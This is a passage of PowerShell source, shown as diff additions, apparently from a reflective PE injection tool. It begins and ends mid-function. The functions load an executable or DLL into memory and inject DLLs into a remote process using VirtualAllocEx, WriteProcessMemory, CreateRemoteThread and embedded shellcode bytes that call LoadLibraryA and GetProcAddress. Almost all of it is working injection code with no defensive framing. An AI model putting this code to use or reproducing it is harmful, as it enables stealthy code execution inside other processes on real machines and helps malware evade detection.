-eq $true) + { + [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64))) + $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr + } + else + { + [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32))) + $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr + } + + if (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -eq $Win32Constants.IMAGE_FILE_DLL) + { + $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'DLL' + } + elseif (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) -eq $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) + { + $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'EXE' + } + else + { + Throw "PE file is not an EXE or DLL" + } + + return $PEInfo + } + + Function Import-DllInRemoteProcess + { + Param( + [Parameter(Position=0, Mandatory=$true)] + [IntPtr] + $RemoteProcHandle, + + [Parameter(Position=1, Mandatory=$true)] + [IntPtr] + $ImportDllPathPtr + ) + + $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) + + $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr) + $DllPathSize = [UIntPtr][UInt64]([UInt64]$ImportDllPath.Length + 1) + $RImportDllPathPtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) + if ($RImportDllPathPtr -eq [IntPtr]::Zero) + { + Throw "Unable to allocate memory in the remote process" + } + + [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero + $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RImportDllPathPtr, $ImportDllPathPtr, $DllPathSize, [Ref]$NumBytesWritten) + + if ($Success -eq $false) + { + Throw "Unable to write DLL path to remote process memory" + } + if ($DllPathSize -ne $NumBytesWritten) + { + Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process" + } + + $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll") + $LoadLibraryAAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "LoadLibraryA") #Kernel32 loaded to the same address for all processes + + [IntPtr]$DllAddress = [IntPtr]::Zero + #For 64bit DLL's, we can't use just CreateRemoteThread to call LoadLibrary because GetExitCodeThread will only give back a 32bit value, but we need a 64bit address + # Instead, write shellcode while calls LoadLibrary and writes the result to a memory address we specify. Then read from that memory once the thread finishes. + if ($PEInfo.PE64Bit -eq $true) + { + #Allocate memory for the address returned by LoadLibraryA + $LoadLibraryARetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) + if ($LoadLibraryARetMem -eq [IntPtr]::Zero) + { + Throw "Unable to allocate memory in the remote process for the return value of LoadLibraryA" + } + + #Write Shellcode to the remote process which will call LoadLibraryA (Shellcode: LoadLibraryA.asm) + $LoadLibrarySC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9) + $LoadLibrarySC2 = @(0x48, 0xba) + $LoadLibrarySC3 = @(0xff, 0xd2, 0x48, 0xba) + $LoadLibrarySC4 = @(0x48, 0x89, 0x02, 0x48, 0x89, 0xdc, 0x5b, 0xc3) + + $SCLength = $LoadLibrarySC1.Length + $LoadLibrarySC2.Length + $LoadLibrarySC3.Length + $LoadLibrarySC4.Length + ($PtrSize * 3) + $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength) + $SCPSMemOriginal = $SCPSMem + + Write-BytesToMemory -Bytes $LoadLibrarySC1 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC1.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($RImportDllPathPtr, $SCPSMem, $false) + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) + Write-BytesToMemory -Bytes $LoadLibrarySC2 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC2.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryAAddr, $SCPSMem, $false) + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) + Write-BytesToMemory -Bytes $LoadLibrarySC3 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC3.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryARetMem, $SCPSMem, $false) + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) + Write-BytesToMemory -Bytes $LoadLibrarySC4 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC4.Length) + + $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) + if ($RSCAddr -eq [IntPtr]::Zero) + { + Throw "Unable to allocate memory in the remote process for shellcode" + } + + $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten) + if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength)) + { + Throw "Unable to write shellcode to remote process memory." + } + + $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions + $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000) + if ($Result -ne 0) + { + Throw "Call to CreateRemoteThread to call GetProcAddress failed." + } + + #The shellcode writes the DLL address to memory in the remote process at address $LoadLibraryARetMem, read this memory + [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize) + $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $LoadLibraryARetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten) + if ($Result -eq $false) + { + Throw "Call to ReadProcessMemory failed" + } + [IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr]) + + $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $LoadLibraryARetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null + $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null + } + else + { + [IntPtr]$RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $LoadLibraryAAddr -ArgumentPtr $RImportDllPathPtr -Win32Functions $Win32Functions + $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000) + if ($Result -ne 0) + { + Throw "Call to CreateRemoteThread to call GetProcAddress failed." + } + + [Int32]$ExitCode = 0 + $Result = $Win32Functions.GetExitCodeThread.Invoke($RThreadHandle, [Ref]$ExitCode) + if (($Result -eq 0) -or ($ExitCode -eq 0)) + { + Throw "Call to GetExitCodeThread failed" + } + + [IntPtr]$DllAddress = [IntPtr]$ExitCode + } + + $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RImportDllPathPtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null + + return $DllAddress + } + + Function Get-RemoteProcAddress + { + Param( + [Parameter(Position=0, Mandatory=$true)] + [IntPtr] + $RemoteProcHandle, + + [Parameter(Position=1, Mandatory=$true)] + [IntPtr] + $RemoteDllHandle, + + [Parameter(Position=2, Mandatory=$true)] + [IntPtr] + $FunctionNamePtr,#This can either be a ptr to a string which is the function name, or, if LoadByOrdinal is 'true' this is an ordinal number (points to nothing) + + [Parameter(Position=3, Mandatory=$true)] + [Bool] + $LoadByOrdinal + ) + + $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) + + [IntPtr]$RFuncNamePtr = [IntPtr]::Zero #Pointer to the function name in remote process memory if loading by function name, ordinal number if loading by ordinal + #If not loading by ordinal, write the function name to the remote process memory + if (-not $LoadByOrdinal) + { + $FunctionName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($FunctionNamePtr) + + #Write FunctionName to memory (will be used in GetProcAddress) + $FunctionNameSize = [UIntPtr][UInt64]([UInt64]$FunctionName.Length + 1) + $RFuncNamePtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $FunctionNameSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) + if ($RFuncNamePtr -eq [IntPtr]::Zero) + { + Throw "Unable to allocate memory in the remote process" + } + + [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero + $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RFuncNamePtr, $FunctionNamePtr, $FunctionNameSize, [Ref]$NumBytesWritten) + if ($Success -eq $false) + { + Throw "Unable to write DLL path to remote process memory" + } + if ($FunctionNameSize -ne $NumBytesWritten) + { + Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process" + } + } + #If loading by ordinal, just set RFuncNamePtr to be the ordinal number + else + { + $RFuncNamePtr = $FunctionNamePtr + } + + #Get address of GetProcAddress + $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll") + $GetProcAddressAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "GetProcAddress") #Kernel32 loaded to the same address for all processes + + #Allocate memory for the address returned by GetProcAddress + $GetProcAddressRetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UInt64][UInt64]$PtrSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) + if ($GetProcAddressRetMem -eq [IntPtr]::Zero) + { + Throw "Unable to allocate memory in the remote process for the return value of GetProcAddress" + } + + #Write Shellcode to the remote process which will call GetProcAddress + #Shellcode: GetProcAddress.asm + [Byte[]]$GetProcAddressSC = @() + if ($PEInfo.PE64Bit -eq $true) + { + $GetProcAddressSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9) + $GetProcAddressSC2 = @(0x48, 0xba) + $GetProcAddressSC3 = @(0x48, 0xb8) + $GetProcAddressSC4 = @(0xff, 0xd0, 0x48, 0xb9) + $GetProcAddressSC5 = @(0x48, 0x89, 0x01, 0x48, 0x89, 0xdc, 0x5b, 0xc3) + } + else + { + $GetProcAddressSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xc0, 0xb8) + $GetProcAddressSC2 = @(0xb9) + $GetProcAddressSC3 = @(0x51, 0x50, 0xb8) + $GetProcAddressSC4 = @(0xff, 0xd0, 0xb9) + $GetProcAddressSC5 = @(0x89, 0x01, 0x89, 0xdc, 0x5b, 0xc3) + } + $SCLength = $GetProcAddressSC1.Length + $GetProcAddressSC2.Length + $GetProcAddressSC3.Length + $GetProcAddressSC4.Length + $GetProcAddressSC5.Length + ($PtrSize * 4) + $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength) + $SCPSMemOriginal = $SCPSMem + + Write-BytesToMemory -Bytes $GetProcAddressSC1 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC1.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($RemoteDllHandle, $SCPSMem, $false) + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) + Write-BytesToMemory -Bytes $GetProcAddressSC2 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC2.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($RFuncNamePtr, $SCPSMem, $false) + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) + Write-BytesToMemory -Bytes $GetProcAddressSC3 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC3.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressAddr, $SCPSMem, $false) + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) + Write-BytesToMemory -Bytes $GetProcAddressSC4 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC4.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressRetMem, $SCPSMem, $false) + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) + Write-BytesToMemory -Bytes $GetProcAddressSC5 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC5.Length) + + $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) + if ($RSCAddr -eq [IntPtr]::Zero) + { + Throw "Unable to allocate memory in the remote process for shellcode" + } + [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero + $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten) + if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength)) + { + Throw "Unable to write shellcode to remote process memory." + } + + $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions + $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000) + if ($Result -ne 0) + { + Throw "Call to CreateRemoteThread to call GetProcAddress failed." + } + + #The process address is written to memory in the remote process at address $GetProcAddressRetMem, read this memory + [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize) + $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $GetProcAddressRetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten) + if (($Result -eq $false) -or ($NumBytesWritten -eq 0)) + { + Throw "Call to ReadProcessMemory failed" + } + [IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr]) + + #Cleanup remote process memory + $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null + $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $GetProcAddressRetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null + + if (-not $LoadByOrdinal) + { + $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RFuncNamePtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null + } + + return $ProcAddress + } + + + Function Copy-Sections + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [Byte[]] + $PEBytes, + + [Parameter(Position = 1, Mandatory = $true)] + [System.Object] + $PEInfo, + + [Parameter(Position = 2, Mandatory = $true)] + [System.Object] + $Win32Functions, + + [Parameter(Position = 3, Mandatory = $true)] + [System.Object] + $Win32Types + ) + + for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++) + { + [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER))) + $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER) + + #Address to copy the section to + [IntPtr]$SectionDestAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$SectionHeader.VirtualAddress)) + + #SizeOfRawData is the size of the data on disk, VirtualSize is the minimum space that can be allocated + # in memory for the section. If VirtualSize > SizeOfRawData, pad the extra spaces with 0. If + # SizeOfRawData > VirtualSize, it is because the section stored on disk has padding that we can throw away, + # so truncate SizeOfRawData to VirtualSize + $SizeOfRawData = $SectionHeader.SizeOfRawData + + if ($SectionHeader.PointerToRawData -eq 0) + { + $SizeOfRawData = 0 + } + + if ($SizeOfRawData -gt $SectionHeader.VirtualSize) + { + $SizeOfRawData = $SectionHeader.VirtualSize + } + + if ($SizeOfRawData -gt 0) + { + Test-MemoryRangeValid -DebugString "Copy-Sections::MarshalCopy" -PEInfo $PEInfo -StartAddress $SectionDestAddr -Size $SizeOfRawData | Out-Null + [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, [Int32]$SectionHeader.PointerToRawData, $SectionDestAddr, $SizeOfRawData) + } + + #If SizeOfRawData is less than VirtualSize, set memory to 0 for the extra space + if ($SectionHeader.SizeOfRawData -lt $SectionHeader.VirtualSize) + { + $Difference = $SectionHeader.VirtualSize - $SizeOfRawData + [IntPtr]$StartAddress = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$SectionDestAddr) ([Int64]$SizeOfRawData)) + Test-MemoryRangeValid -DebugString "Copy-Sections::Memset" -PEInfo $PEInfo -StartAddress $StartAddress -Size $Difference | Out-Null + $Win32Functions.memset.Invoke($StartAddress, 0, [IntPtr]$Difference) | Out-Null + } + } + } + + + Function Update-MemoryAddresses + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [System.Object] + $PEInfo, + + [Parameter(Position = 1, Mandatory = $true)] + [Int64] + $OriginalImageBase, + + [Parameter(Position = 2, Mandatory = $true)] + [System.Object] + $Win32Constants, + + [Parameter(Position = 3, Mandatory = $true)] + [System.Object] + $Win32Types + ) + + [Int64]$BaseDifference = 0 + $AddDifference = $true #Track if the difference variable should be added or subtracted from variables + [UInt32]$ImageBaseRelocSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_BASE_RELOCATION) + + #If the PE was loaded to its expected address or there are no entries in the BaseRelocationTable, nothing to do + if (($OriginalImageBase -eq [Int64]$PEInfo.EffectivePEHandle) ` + -or ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size -eq 0)) + { + return + } + + + elseif ((Compare-Val1GreaterThanVal2AsUInt ($OriginalImageBase) ($PEInfo.EffectivePEHandle)) -eq $true) + { + $BaseDifference = Sub-SignedIntAsUnsigned ($OriginalImageBase) ($PEInfo.EffectivePEHandle) + $AddDifference = $false + } + elseif ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.EffectivePEHandle) ($OriginalImageBase)) -eq $true) + { + $BaseDifference = Sub-SignedIntAsUnsigned ($PEInfo.EffectivePEHandle) ($OriginalImageBase) + } + + #Use the IMAGE_BASE_RELOCATION structure to find memory addresses which need to be modified + [IntPtr]$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAddress)) + while($true) + { + #If SizeOfBlock == 0, we are done + $BaseRelocationTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($BaseRelocPtr, [Type]$Win32Types.IMAGE_BASE_RELOCATION) + + if ($BaseRelocationTable.SizeOfBlock -eq 0) + { + break + } + + [IntPtr]$MemAddrBase = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$BaseRelocationTable.VirtualAddress)) + $NumRelocations = ($BaseRelocationTable.SizeOfBlock - $ImageBaseRelocSize) / 2 + + #Loop through each relocation + for($i = 0; $i -lt $NumRelocations; $i++) + { + #Get info for this relocation + $RelocationInfoPtr = [IntPtr](Add-SignedIntAsUnsigned ([IntPtr]$BaseRelocPtr) ([Int64]$ImageBaseRelocSize + (2 * $i))) + [UInt16]$RelocationInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($RelocationInfoPtr, [Type][UInt16]) + + #First 4 bits is the relocation type, last 12 bits is the address offset from $MemAddrBase + [UInt16]$RelocOffset = $RelocationInfo -band 0x0FFF + [UInt16]$RelocType = $RelocationInfo -band 0xF000 + for ($j = 0; $j -lt 12; $j++) + { + $RelocType = [Math]::Floor($RelocType / 2) + } + + #For DLL's there are two types of relocations used according to the following MSDN article. One for 64bit and one for 32bit. + #This appears to be true for EXE's as well. + # Site: http://msdn.microsoft.com/en-us/magazine/cc301808.aspx + if (($RelocType -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) ` + -or ($RelocType -eq $Win32Constants.IMAGE_REL_BASED_DIR64)) + { + #Get the current memory address and update it based off the difference between PE expected base address and actual base address + [IntPtr]$FinalAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$MemAddrBase) ([Int64]$RelocOffset)) + [IntPtr]$CurrAddr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FinalAddr, [Type][IntPtr]) + + if ($AddDifference -eq $true) + { + [IntPtr]$CurrAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference)) + } + else + { + [IntPtr]$CurrAddr = [IntPtr](Sub-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference)) + } + + [System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null + } + elseif ($RelocType -ne $Win32Constants.IMAGE_REL_BASED_ABSOLUTE) + { + #IMAGE_REL_BASED_ABSOLUTE is just used for padding, we don't actually do anything with it + Throw "Unknown relocation found, relocation value: $RelocType, relocationinfo: $RelocationInfo" + } + } + + $BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$BaseRelocPtr) ([Int64]$BaseRelocationTable.SizeOfBlock)) + } + } + + + Function Import-DllImports + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [System.Object] + $PEInfo, + + [Parameter(Position = 1, Mandatory = $true)] + [System.Object] + $Win32Functions, + + [Parameter(Position = 2, Mandatory = $true)] + [System.Object] + $Win32Types, + + [Parameter(Position = 3, Mandatory = $true)] + [System.Object] + $Win32Constants, + + [Parameter(Position = 4, Mandatory = $false)] + [IntPtr] + $RemoteProcHandle + ) + + $RemoteLoading = $false + if ($PEInfo.PEHandle -ne $PEInfo.EffectivePEHandle) + { + $RemoteLoading = $true + } + + if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0) + { + [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress) + + while ($true) + { + $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR) + + #If the structure is null, it signals that this is the end of the array + if ($ImportDescriptor.Characteristics -eq 0 ` + -and $ImportDescriptor.FirstThunk -eq 0 ` + -and $ImportDescriptor.ForwarderChain -eq 0 ` + -and $ImportDescriptor.Name -eq 0 ` + -and $ImportDescriptor.TimeDateStamp -eq 0) + { + Write-Verbose "Done importing DLL imports" + break + } + + $ImportDllHandle = [IntPtr]::Zero + $ImportDllPathPtr = (Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name)) + $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr) + + if ($RemoteLoading -eq $true) + { + $ImportDllHandle = Import-DllInRemoteProcess -RemoteProcHandle $RemoteProcHandle -ImportDllPathPtr $ImportDllPathPtr + } + else + { + $ImportDllHandle = $Win32Functions.LoadLibrary.Invoke($ImportDllPath) + } + + if (($ImportDllHandle -eq $null) -or ($ImportDllHandle -eq [IntPtr]::Zero)) + { + throw "Error importing DLL, DLLName: $ImportDllPath" + } + + #Get the first thunk, then loop through all of them + [IntPtr]$ThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.FirstThunk) + [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.Characteristics) #Characteristics is overloaded with OriginalFirstThunk + [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr]) + + while ($OriginalThunkRefVal -ne [IntPtr]::Zero) + { + $LoadByOrdinal = $false + [IntPtr]$ProcedureNamePtr = [IntPtr]::Zero + #Compare thunkRefVal to IMAGE_ORDINAL_FLAG, which is defined as 0x80000000 or 0x8000000000000000 depending on 32bit or 64bit + # If the top bit is set on an int, it will be negative, so instead of worrying about casting this to uint + # and doing the comparison, just see if it is less than 0 + [IntPtr]$NewThunkRef = [IntPtr]::Zero + if([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4 -and [Int32]$OriginalThunkRefVal -lt 0) + { + [IntPtr]$ProcedureNamePtr = [IntPtr]$OriginalThunkRefVal -band 0xffff #This is actually a lookup by ordinal + $LoadByOrdinal = $true + } + elseif([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8 -and [Int64]$OriginalThunkRefVal -lt 0) + { + [IntPtr]$ProcedureNamePtr = [Int64]$OriginalThunkRefVal -band 0xffff #This is actually a lookup by ordinal + $LoadByOrdinal = $true + } + else + { + [IntPtr]$StringAddr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($OriginalThunkRefVal) + $StringAddr = Add-SignedIntAsUnsigned $StringAddr ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16])) + $ProcedureName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($StringAddr) + $ProcedureNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ProcedureName) + } + + if ($RemoteLoading -eq $true) + { + [IntPtr]$NewThunkRef = Get-RemoteProcAddress -RemoteProcHandle $RemoteProcHandle -RemoteDllHandle $ImportDllHandle -FunctionNamePtr $ProcedureNamePtr -LoadByOrdinal $LoadByOrdinal + } + else + { + [IntPtr]$NewThunkRef = $Win32Functions.GetProcAddressIntPtr.Invoke($ImportDllHandle, $ProcedureNamePtr) + } + + if ($NewThunkRef -eq $null -or $NewThunkRef -eq [IntPtr]::Zero) + { + if ($LoadByOrdinal) + { + Throw "New function reference is null, this is almost certainly a bug in this script. Function Ordinal: $ProcedureNamePtr. Dll: $ImportDllPath" + } + else + { + Throw "New function reference is null, this is almost certainly a bug in this script. Function: $ProcedureName. Dll: $ImportDllPath" + } + } + + [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewThunkRef, $ThunkRef, $false) + + $ThunkRef = Add-SignedIntAsUnsigned ([Int64]$ThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])) + [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ([Int64]$OriginalThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])) + [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr]) + + #Cleanup + #If loading by ordinal, ProcedureNamePtr is the ordinal value and not actually a pointer to a buffer that needs to be freed + if ((-not $LoadByOrdinal) -and ($ProcedureNamePtr -ne [IntPtr]::Zero)) + { + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ProcedureNamePtr) + $ProcedureNamePtr = [IntPtr]::Zero + } + } + + $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)) + } + } + } + + Function Get-VirtualProtectValue + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [UInt32] + $SectionCharacteristics + ) + + $ProtectionFlag = 0x0 + if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_EXECUTE) -gt 0) + { + if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0) + { + if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) + { + $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READWRITE + } + else + { + $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READ + } + } + else + { + if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) + { 